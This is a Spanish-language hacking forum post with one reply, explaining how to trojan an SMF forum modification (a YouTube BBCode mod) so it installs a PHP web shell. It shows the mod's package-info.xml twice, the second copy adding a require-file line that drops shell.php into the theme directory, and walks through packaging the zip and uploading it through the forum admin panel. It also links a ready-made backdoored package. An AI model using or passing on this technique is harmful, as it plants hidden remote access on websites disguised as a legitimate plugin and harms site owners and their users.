Hola amigos de underc0de , realizando mi primer post les traigo un mod cualquiera en este caso mod youtube , implementado con una shell , esta shell se infiltrará dentro de la modificacion de la siguiente manera.
Archivo por defecto de un mod smf :package-info.xml<?xml version="1.0"?>
<!DOCTYPE package-info SYSTEM "http://www.simplemachines.org/xml/package-info">
<package-info xmlns="http://www.simplemachines.org/xml/package-info" xmlns:smf="http://www.simplemachines.org/">
<name>YouTube BBCode</name>
<id>karlbenson:youtubebbcode</id>
<type>modification</type>
<version>2.6</version>
<!--// Install for SMF 1.1.x versions only //-->
<install for="1.1 - 1.1.99">
<readme type="file" parsebbc="true">readme.txt</readme>
<modification>install-1.1.x.xml</modification>
<modification>languagestrings.xml</modification>
<require-file name="youtube.gif" destination="$imagesdir/bbc" />
</install>
<!--// Uninstall for SMF 1.1.x versions only //-->
<uninstall for="1.1 - 1.1.99">
<modification reverse="true">install-1.1.x.xml</modification>
<modification reverse="true">languagestrings.xml</modification>
<remove-file name="$imagesdir/bbc/youtube.gif" />
</uninstall>
<!--// Install for SMF 2.0 Beta 2/3/4 and above //-->
<install for="2.0 - 2.99.99">
<readme type="file" parsebbc="true">readme.txt</readme>
<modification>install-2.0.xml</modification>
<modification>languagestrings.xml</modification>
<require-file name="youtube.gif" destination="$imagesdir/bbc" />
</install>
<!--// Uninstall for SMF 2.0 Beta 2/3/4 and above //-->
<uninstall for="2.0 - 2.99.99">
<modification reverse="true">install-2.0.xml</modification>
<modification reverse="true">languagestrings.xml</modification>
<remove-file name="$imagesdir/bbc/youtube.gif" />
</uninstall>
</package-info>Para implementar la shell dentro de cualquier mod , tenemos que agregar la siguiente linea de código:
<require-file name="shell.php" destination="$themedir" />
Con esto decimos que requerimos que dentro de la carpeta del mod un archivo llamado shell.php , y que se alojara en /Themes/Default , por eso decimos destination="$themedir" .
agregando la linea de codigo quedaria asi:<?xml version="1.0"?>
<!DOCTYPE package-info SYSTEM "http://www.simplemachines.org/xml/package-info">
<package-info xmlns="http://www.simplemachines.org/xml/package-info" xmlns:smf="http://www.simplemachines.org/">
<name>YouTube BBCode</name>
<id>karlbenson:youtubebbcode</id>
<type>modification</type>
<version>2.6</version>
<!--// Install for SMF 1.1.x versions only //-->
<install for="1.1 - 1.1.99">
<readme type="file" parsebbc="true">readme.txt</readme>
<modification>install-1.1.x.xml</modification>
<modification>languagestrings.xml</modification>
<require-file name="youtube.gif" destination="$imagesdir/bbc" />
<require-file name="shell.php" destination="$themedir" />
</install>
<!--// Uninstall for SMF 1.1.x versions only //-->
<uninstall for="1.1 - 1.1.99">
<modification reverse="true">install-1.1.x.xml</modification>
<modification reverse="true">languagestrings.xml</modification>
<remove-file name="$imagesdir/bbc/youtube.gif" />
</uninstall>
<!--// Install for SMF 2.0 Beta 2/3/4 and above //-->
<install for="2.0 - 2.99.99">
<readme type="file" parsebbc="true">readme.txt</readme>
<modification>install-2.0.xml</modification>
<modification>languagestrings.xml</modification>
<require-file name="youtube.gif" destination="$imagesdir/bbc" />
<require-file name="shell.php" destination="$themedir" />
</install>
<!--// Uninstall for SMF 2.0 Beta 2/3/4 and above //-->
<uninstall for="2.0 - 2.99.99">
<modification reverse="true">install-2.0.xml</modification>
<modification reverse="true">languagestrings.xml</modification>
<remove-file name="$imagesdir/bbc/youtube.gif" />
</uninstall>
</package-info>Nos queda copiar la shell.php en la carpeta de la modificacion smf.
Una vez copiada , comprimimos el mod en .zip.
Y tendriamos lista la shell para subirla por la administracion del foro smf !
(http://img79.xooimage.com/files/f/4/4/shell2-343f1c3.png)
(http://img85.xooimage.com/files/8/b/7/shell-35ddd11.png)
Aqui les dejo un video por si no entendieron.Link de descarga del mod listo y empaquetado :http://9b4b807e.linkbucks.com
Excelente post :) Muy interesante método.
http://underc0de.org/foro/bugs-y-exploits/shell-upload-en-conocidos-cms/
Saludos,
Dedalo